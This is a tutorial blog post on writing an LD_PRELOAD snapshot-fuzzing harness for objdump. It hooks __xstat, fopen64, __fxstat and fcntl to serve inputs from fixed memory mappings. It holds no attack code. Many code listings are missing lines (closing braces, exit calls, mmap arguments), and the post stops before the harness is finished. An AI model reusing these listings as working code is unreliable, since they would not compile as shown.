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Fuzzing Like A Caveman 6: Binary Only Snapshot Fuzzing Harness

By: h0mbre
2 April 2022 at 04:00


It’s been a while since I’ve done one of these, and one of my goals this year is to do more so here we are. A side project of mine is kind of reaching a good stopping point so I’ll have more free-time to do my own research and blog again. Looking forward to sharing more and more this year.

One of the most common questions that comes up in beginner fuzzing circles (of which I’m obviously a member) is how to harness a target so that it can be fuzzed in memory, as some would call in β€˜persistent’ fashion, in order to gain performance. Persistent fuzzing has a niche use-case where the target doesn’t touch much global state from fuzzcase to fuzzcase, an example would be a tight fuzzing loop for a single API in a library, or maybe a single function in a binary.

This style of fuzzing is faster than re-executing the target from scratch over and over as we bypass all the heavy syscalls/kernel routines associated with creating and destroying task structs.

However, with binary targets for which we don’t have source code, it’s sometimes hard to discern what global state we’re affecting while executing any code path without some heavy reverse engineering (disgusting, work? gross). Additionally, we often want to fuzz a wider loop. It doesn’t do us much good to fuzz a function which returns a struct that is then never read or consumed in our fuzzing workflow. With these things in mind, we often find that β€˜snapshot’ fuzzing would be a more robust workflow for binary targets, or even production binaries for which, we have source, but have gone through the sausage factory of enterprise build systems.

So today, we’re going to learn how to take an arbitrary binary only target that takes an input file from the user and turn it into a target that takes its input from memory instead and lends itself well to having its state reset between fuzzcases.

Target (Easy Mode)

For the purposes of this blogpost, we’re going to harness objdump to be snapshot fuzzed. This will serve our purposes because it’s relatively simple (single threaded, single process) and it’s a common fuzzing target, especially as people do development work on their fuzzers. The point of this is not to impress you by sandboxing some insane target like Chrome, but to show beginners how to start thinking about harnessing. You want to lobotomize your targets so that they are unrecognizable to their original selves but retain the same semantics. You can get as creative as you want, and honestly, sometimes harnessing targets is some of the most satisfying work related to fuzzing. It feels great to successfully sandbox a target and have it play nice with your fuzzer. On to it then.

Hello World

The first step is to determine how we want to change objdump’s behavior. Let’s try running it under strace and disassemble ls and see how it behaves at the syscall level with strace objdump -D /bin/ls. What we’re looking for is the point where objdump starts interacting with our input, /bin/ls in this case. In the output, if you scroll down past the boilerplate stuff, you can see the first appearance of /bin/ls:

stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
openat(AT_FDCWD, "/bin/ls", O_RDONLY)   = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0

Keep in mind that as you read through this, if you’re following along at home, your output might not match mine exactly. I’m likely on a different distribution than you running a different objdump than you. But the point of the blogpost is to just show concepts that you can be creative on your own.

I also noticed that the program doesn’t close our input file until the end of execution:

read(3, "\0\0\0\0\0\0\0\0\10\0\"\0\0\0\0\0\1\0\0\0\377\377\377\377\1\0\0\0\0\0\0\0"..., 4096) = 2720
write(1, ":(%rax)\n  21ffa4:\t00 00         "..., 4096) = 4096
write(1, "x0,%eax\n  220105:\t00 00         "..., 4096) = 4096
close(3)                                = 0
write(1, "023e:\t00 00                \tadd "..., 2190) = 2190
exit_group(0)                           = ?
+++ exited with 0 +++

This is good to know, we’ll need our harness to be able to emulate an input file fairly well since objdump doesn’t just read our file into a memory buffer in one shot or mmap() the input file. It is continuously reading from the file throughout the strace output.

Since we don’t have source code for the target, we’re going to affect behavior by using an LD_PRELOAD shared object. By using an LD_PRELOAD shared object, we should be able to hook the wrapper functions around the syscalls that interact with our input file and change their behavior to suit our purposes. If you are unfamiliar with dynamic linking or LD_PRELOAD, this would be a good stopping point to go Google around for more information great starting point. For starters, let’s just get a Hello, World! shared object loaded.

We can utilize gcc Function Attributes to have our shared object execute code when it is loaded by the target by leveraging the constructor attribute.

So our code so far will look like this:

Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl

#include <stdio.h> /* printf */

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");

I added the compiler flags needed to compile to the top of the file as a comment. I got these flags from this blogpost on using LD_PRELOAD shared objects a while ago: https://tbrindus.ca/correct-ld-preload-hooking-libc/.

We can now use the LD_PRELOAD environment variable and run objdump with our shared object which should print when loaded:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D /bin/ls > /tmp/output.txt && head -n 20 /tmp/output.txt
**> LD_PRELOAD shared object loaded!

/bin/ls:     file format elf64-x86-64

Disassembly of section .interp:

0000000000000238 <.interp>:
 238:   2f                      (bad)  
 239:   6c                      ins    BYTE PTR es:[rdi],dx
 23a:   69 62 36 34 2f 6c 64    imul   esp,DWORD PTR [rdx+0x36],0x646c2f34
 241:   2d 6c 69 6e 75          sub    eax,0x756e696c
 246:   78 2d                   js     275 <_init@@Base-0x34e3>
 248:   78 38                   js     282 <_init@@Base-0x34d6>
 24a:   36 2d 36 34 2e 73       ss sub eax,0x732e3436
 250:   6f                      outs   dx,DWORD PTR ds:[rsi]
 251:   2e 32 00                xor    al,BYTE PTR cs:[rax]

Disassembly of section .note.ABI-tag:

It works, now we can start looking for functions to hook.

Looking for Hooks

First thing we need to do, is create a fake file name to give objdump so that we can start testing things out. We will copy /bin/ls into the current working directory and call it fuzzme. This will allow us to generically play around with the harness for testing purposes. Now we have our strace output, we know that objdump calls stat() on the path for our input file (/bin/ls) a couple of times before we get that call to openat(). Since we know our file hasn’t been opened yet, and the syscall uses the path for the first arg, we can guess that this syscall results from the libc exported wrapper function for stat() or lstat(). I’m going to assume stat() since we aren’t dealing with any symbolic links for /bin/ls on my box. We can add a hook for stat() to test to see if we hit it and check if it’s being called for our target input file (now changed to fuzzme).

In order to create a hook, we will follow a pattern where we define a pointer to the real function via a typedef and then we will initialize the pointer as NULL. Once we need to resolve the location of the real function we are hooking, we can use dlsym(RLTD_NEXT, <symbol name>) to get it’s location and change the pointer value to the real symbol address. (This will be more clear later on).

Now we need to hook stat() which appears as a man 3 entry here (meaning it’s a libc exported function) as well as a man 2 entry (meaning it is a syscall). This was confusing to me for the longest time and I often misunderstood how syscalls actually worked because of this insistence on naming collisions. You can read one of the first research blogposts I ever did here where the confusion is palpable and I often make erroneous claims. (PS, I’ll never edit the old blogposts with errors in them, they are like time capsules, and it’s kind of cool to me).

We want to write a function that when called, simply prints something and exits so that we know our hook was hit. For now, our code looks like this:

Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl

#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*stat_t)(const char *restrict path, struct stat *restrict buf);
stat_t real_stat = NULL;

// Hook function, objdump will call this stat instead of the real one
int stat(const char *restrict path, struct stat *restrict buf) {
    printf("** stat() hook!\n");

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");

However, if we compile and run that, we don’t ever print and exit so our hook is not being called. Something is going wrong. Sometimes, file related functions in libc have 64 variants, such as open() and open64() that are used somewhat interchangably depending on configurations and flags. I tried hooking a stat64() but still had no luck with the hook being reached.

Luckily, I’m not the first person with this problem, there is a great answer on Stackoverflow about the very issue that describes how libc doesn’t actually export stat() the same way it does for other functions like open() and open64(), instead it exports a symbol called __xstat() which has a slightly different signature and requires a new argument called version which is meant to describe which version of stat struct the caller is expecting. This is supposed to all happen magically under the hood but that’s where we live now, so we have to make the magic happen ourselves. The same rules apply for lstat() and fstat() as well, they have __lxstat() and __fxstat() respectively.

I found the definitions for the functions here. So we can add the __xstat() hook to our shared object in place of the stat() and see if our luck changes. Our code now looks like this:

Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl

#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Hook function, objdump will call this stat instead of the real one
int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
    printf("** Hit our __xstat() hook!\n");

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");

Now if we run our shared object, we get the desired outcome, somewhere, our hook is hit. Now we can help ourselves out a bit and print the filenames being requested by the hook and then actually call the real __xstat() on behalf of the caller. Now when our hook is hit, we will have to resolve the location of the real __xstat() by name, so we’ll add a symbol resolving function to our shared object. Our shared object code now looks like this:

Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
    return addr;

// Hook function, objdump will call this stat instead of the real one
int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
    // Print the filename requested
    printf("** __xstat() hook called for filename: '%s'\n", __filename);

    // Resolve the address of the real __xstat() on demand and only once
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");

    // Call the real __xstat() for the caller so everything keeps going
    return real_xstat(__ver, __filename, __stat_buf);

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");

Ok so now when we run this, and we check for our print statements, things get a little spicy.

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt && grep "** __xstat" /tmp/output.txt
** __xstat() hook called for filename: 'fuzzme'
** __xstat() hook called for filename: 'fuzzme'

So now we can have some fun.

__xstat() Hook

So the purpose of this hook will be to lie to objdump and make it think it successfully stat() the input file. Remember, we’re making a snapshot fuzzing harness so our objective is to constantly be creating new inputs and feeding them to objdump through this harness. Most importantly, our harness will need to be able to represent our variable length inputs (which will be stored purely in memory) as files. Each fuzzcase, the file length can change and our harness needs to accomodate that.

My idea at this point was to create a somewhat β€œlegit” stat struct that would normally be returned for our actual file fuzzme which is just a copy of /bin/ls. We can store this stat struct globally and only update the size field as each new fuzz case comes through. So the timeline of our snapshot fuzzing workflow would look something like:

  1. Our constructor function is called when our shared object is loaded
  2. Our constructor sets up a global β€œlegit” stat struct that we can update for each fuzzcase and pass back to callers of __xstat() trying to stat() our fuzzing target
  3. The imaginary fuzzer runs objdump to the snapshot location
  4. Our __xstat() hook updates the the global β€œlegit” stat struct size field and copies the stat struct into the caller’s buffer
  5. The imaginary fuzzer restores the state of objdump to its state at snapshot time
  6. The imaginary fuzzer copies a new input into harness and updates the input size
  7. Our __xstat() hook is called once again, and we repeat step 4, this process occurs over and over forever.

So we’re imagining the fuzzer has some routine like this in pseudocode, even though it’d likely be cross-process and require process_vm_writev:

insert_fuzzcase(config.input_location, config.input_size_location, input, input_size) {
  memcpy(config.input_location, &input, input_size);
  memcpy(config.input_size_location, &input_size, sizeof(size_t));

One important thing to keep in mind is that if the snapshot fuzzer is restoring objdump to its snapshot state every fuzzing iteration, we must be careful not to depend on any global mutable memory. The global stat struct will be safe since it will be instantiated during the constructor however, its size-field will be restored to its original value each fuzzing iteration by the fuzzer’s snapshot restore routine.

We will also need a global, recognizable address to store variable mutable global data like the current input’s size. Several snapshot fuzzers have the flexibility to ignore contiguous ranges of memory for restoration purposes. So if we’re able to create some contiguous buffers in memory at recognizable addresses, we can have our imaginary fuzzer ignore those ranges for snapshot restorations. So we need to have a place to store the inputs, as well as information about their size. We would then somehow tell the fuzzer about these locations and when it generated a new input, it would copy it into the input location and then update the current input size information.

So now our constructor has an additional job: setup the input location as well as the input size information. We can do this easily with a call to mmap() which will allow us to specify an address we want our mapping mapped to with the MAP_FIXED flag. We’ll also create a MAX_INPUT_SZ definition so that we know how much memory to map from the input location.

Just by themselves, the functions related to mapping memory space for the inputs themselves and their size information looks like this. Notice that we use MAP_FIXED and we check the returned address from mmap() just to make sure the call didn’t succeed but map our memory at a different location:

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);

mmap() will actually map multiples of whatever the page size is on your system (typically 4096 bytes). So, when we ask for sizeof(size_t) bytes for the mapping, mmap() is like: β€œHmm, that’s just a page dude” and gives us back a whole page from 0x1336000 - 0x1337000 not inclusive on the high-end.

Random sidenote, be careful about arithmetic in definitions and macros as I’ve done here with MAX_INPUT_SIZE, it’s very easy for the pre-processor to substitute your text for the definition keyword and ruin some order of operations or even overflow a specific primitive type like int.

Now that we have memory set up for the fuzzer to store inputs and information about the input’s size, we can create that global stat struct. But we actually have a big problem. How can we call into __xstat() to get our β€œlegit” stat struct if we have __xstat() hooked? We would hit our own hook. To circumvent this, we can call __xstat() with a special __ver argument that we know will mean that it was called from our constructor, the variable is an int so let’s go with 0x1337 as the special value. That way, in our hook, if we check __ver and it’s 0x1337, we know we are being called from the constructor and we can actually stat our real file and create a global β€œlegit” stat struct. When I dumped a normal call by objdump to __xstat() the __version was always a value of 1 so we will patch it back to that inside our hook. Now our entire shared object source file should look like this:

Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */
#include <sys/mman.h> /* mmap */
#include <string.h> /* memset */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// Our "legit" global stat struct
struct stat st;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
    return addr;

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (NULL == real_xstat) {
        real_xstat = _resolve_symbol("__xstat");

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);

    return ret;

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size

Now if we run this, we get the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: Warning: 'fuzzme' is not an ordinary file

This is cool, this means that the objdump devs did something right and their stat() would say: β€œHey, this file is zero bytes in length, something weird is going on” and they spit out this error message and exit. Good job devs!

So we have identified a problem, we need to simulate the fuzzer placing a real input into memory, to do that, I’m going to start using #ifdef to define whether or not we’re testing our shared object. So basically, if we compile the shared object and define TEST, our shared object will copy an β€œinput” into memory to simulate how the fuzzer would behave during fuzzing and we can see if our harness is working appropriately. So if we define TEST, we will copy /bin/ed into memory, and we will update our global β€œlegit” stat struct size member, and place the /bin/ed bytes into memory.

You can compile the shared object now to perform the test as follows:

gcc -D TEST -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ld

We also need to set up our global β€œlegit” stat struct, the code to do that should look as follows. Remember, we pass a fake __ver variable to let the __xstat() hook know that it’s us in the constructor routine, which allows the hook to behave well and give us the stat struct we need:

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    // Create a global stat struct for our file in case someone asks, this way
    // when someone calls stat() or fstat() on our target, we can just return the
    // slightly altered (new size) stat struct &skip the kernel, save syscalls
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);

All in all, our entire harness looks like this now:

Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */
#include <sys/mman.h> /* mmap */
#include <string.h> /* memset */
#include <fcntl.h> /* open */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET     "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// For testing purposes, we read /bin/ed into our input buffer to simulate
// what the fuzzer would do
#define  TEST_FILE      "/bin/ed"

// Our "legit" global stat struct
struct stat st;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
    return addr;

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);

    return ret;

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);

// Used for testing, load /bin/ed into the input buffer and update its size info
#ifdef TEST
static void _test_func(void) {    
    // Open TEST_FILE for reading
    int fd = open(TEST_FILE, O_RDONLY);
    if (-1 == fd) {
        printf("Failed to open '%s' during test\n", TEST_FILE);

    // Attempt to read max input buf size
    ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);

    // Update the input size
    *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size

    // Setup global "legit" stat struct

    // If we're testing, load /bin/ed up into our input buffer and update size
#ifdef TEST

Now if we run this under strace, we notice that our two stat() calls are conspicuously missing.

close(3)                                = 0
openat(AT_FDCWD, "fuzzme", O_RDONLY)    = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0

We no longer see the stat() calls before the openat() and the program does not break in any significant way. So this hook seems to be working appropriately. We now need to handle the openat() and make sure we don’t actually interact with our input file, but instead trick objdump to interact with our input in memory.

Finding a Way to Hook openat()

My non-expert intuition tells me theres probably a few ways in which a libc function could end up calling openat() under the hood. Those ways might include the wrappers open() as well as fopen(). We also need to be mindful of their 64 variants as well (open64(), fopen64()). I decided to try the fopen() hooks first:

// Declare prototype for the real fopen and its friend fopen64 
typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
fopen_t real_fopen = NULL;

typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
fopen64_t real_fopen64 = NULL;


// Exploratory hooks to see if we're using fopen() related functions to open
// our input file
FILE* fopen(const char* pathname, const char* mode) {
    printf("** fopen() called for '%s'\n", pathname);

FILE* fopen64(const char* pathname, const char* mode) {
    printf("** fopen64() called for '%s'\n", pathname);

If we compile and run our exploratory hooks, we get the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
** fopen64() called for 'fuzzme'

Bingo, dino DNA.

So now we can flesh that hooked function out a bit to behave how we want.

Refining an fopen64() Hook

The definition for fopen64() is: ` FILE *fopen(const char *restrict pathname, const char *restrict mode);. The returned FILE * poses a slight problem to us because this is an opaque data structure that is not meant to be understood by the caller. Which is to say, the caller is not meant to access any members of this data structure or worry about its layout in any way. You're just supposed to use the returned FILE * as an object to pass to other functions, such as fclose()`. The system deals with the data structure there in those types of related functions so that programmers don’t have to worry about a specific implementation.

We don’t actually know how the returned FILE * will be used, it may not be used at all, or it may be passed to a function such as fread() so we need a way to return a convincing FILE * data structure to the caller that is actually built from our input in memory and NOT from the input file. Luckily, there is a libc function called fmemopen() which behaves very similarly to fopen() and also returns a FILE *. So we can go ahead and create a FILE * to return to callers of fopen64() with fuzzme as the target input file. Shoutout to @domenuk for showing me fmemopen(), I had never come across it before.

There is one key difference though. fopen() will actually obtain file descriptor for the underlying file and fmemopen(), since it is not actually openining a file, will not. So somewhere in the FILE * data structure, there is a file descriptor for the underlying file if returned from fopen() and there isn’t one if returned from fmemopen(). This is very important as functions such as int fileno(FILE *stream) can parse a FILE * and return its underlying file descriptor to the caller. Objdump may want to do this for some reason and we need to be able to robustly handle it. So we need a way to know if someone is trying to use our faked FILE * underlying file descriptor.

My idea for this was to simply find the struct member containing the file descriptor in the FILE * returned from fmemopen() and change it to be something ridiculous like 1337 so that if objdump ever tried to use that file descriptor we would know the source of it and could try to hook any interactions with the file descriptor. So now our fopen64() hook should look as follows:

// Our fopen hook, return a FILE* to the caller, also, if we are opening our
// target make sure we're not able to write to the file
FILE* fopen64(const char* pathname, const char* mode) {
    // Resolve symbol on demand and only once
    if (NULL == real_fopen64) {
        real_fopen64 = _resolve_symbol("fopen64");

    // Check to see what file we're opening
    FILE* ret = NULL;
    if (!strcmp(FUZZ_TARGET, pathname)) {
        // We're trying to open our file, make sure it's a read-only mode
        if (strcmp(mode, "r")) {
            printf("Attempt to open fuzz-target in illegal mode: '%s'\n", mode);

        // Open shared memory FILE* and return to caller
        ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
        // Make sure we've never fopen()'d our fuzzing target before
        if (faked_fp) {
            printf("Attempting to fopen64() fuzzing target more than once\n");

        // Update faked_fp
        faked_fp = ret;

        // Change the filedes to something we know
        ret->_fileno = 1337;

    // We're not opening our file, send to regular fopen
    else {
        ret = real_fopen64(pathname, mode);

    // Return FILE stream ptr to caller
    return ret;

You can see we:

  1. Resolve the symbol location if it hasn’t been yet
  2. Check to see if we’re being called on our fuzzing target input file
  3. Call fmemopen() and open the memory buffer where our current input is in memory along with the input’s size

You may also notice a few safety checks as well to make sure things don’t go unnoticed. We have a global variable that is FILE *faked_fp that we initialize to NULL which let’s us know if we’ve ever opened our input more than once (it wouldn’t be NULL anymore on subsequent attempts to open it).

We also do a check on the mode argument to make sure we’re getting a read-only FILE * back. We don’t want objdump to alter our input or write to it in any way and if it tries to, we need to know about it.

Running our shared object at this point nets us the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: fuzzme: Bad file descriptor

My spidey-sense is telling me something tried to interact with a file descriptor of 1337. Let’s run again under strace and see what happens.

h0mbre@ubuntu:~/blogpost$ strace -E LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt

In the output, we can see some syscalls to fcntl() and fstat() both being called with a file descriptor of 1337 which obviously doesn’t exist in our objdump process, so we’ve been able to find the problem.

fcntl(1337, F_GETFD)                    = -1 EBADF (Bad file descriptor)
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1337, 0x7fff4bf54c90)             = -1 EBADF (Bad file descriptor)
fstat(1337, 0x7fff4bf54bf0)             = -1 EBADF (Bad file descriptor)

As we’ve already learned, there is no direct export in libc for fstat(), it’s one of those weird ones like stat() and we actually have to hook __fxstat(). So let’s try and hook that to see if it gets called for our 1337 file descriptor. The hook function will look like this to start:

// Declare prototype for the real __fxstat
typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
__fxstat_t real_fxstat = NULL;


// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    printf("** __fxstat() called for __filedesc: %d\n", __filedesc);

Now we also still have that fcntl() to deal with, luckily that hook is straightforward, if someone asks for the F_GETFD aka, the flags associated with that special 1337 file descriptor, we’ll simply return O_RDONLY as those were the flags it was β€œopened” with, and we’ll just panic for now if someone calls it for a different file descriptor. This hook looks like this:

// Declare prototype for the real __fcntl
typedef int (*fcntl_t)(int fildes, int cmd, ...);
fcntl_t real_fcntl = NULL;


// Hook for fcntl
int fcntl(int fildes, int cmd, ...) {
    // Resolve fcntl symbol if needed
    if (NULL == real_fcntl) {
        real_fcntl = _resolve_symbol("fcntl");

    if (fildes == 1337) {
        return O_RDONLY;

    else {
        printf("** fcntl() called for real file descriptor\n");

Running this under strace now, the fcntl() call is absent as we would expect:

openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26376, ...}) = 0
mmap(NULL, 26376, PROT_READ, MAP_SHARED, 3, 0) = 0x7ff61d331000
close(3)                                = 0
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
write(1, "** __fxstat() called for __filed"..., 42) = 42
exit_group(0)                           = ?
+++ exited with 0 +++

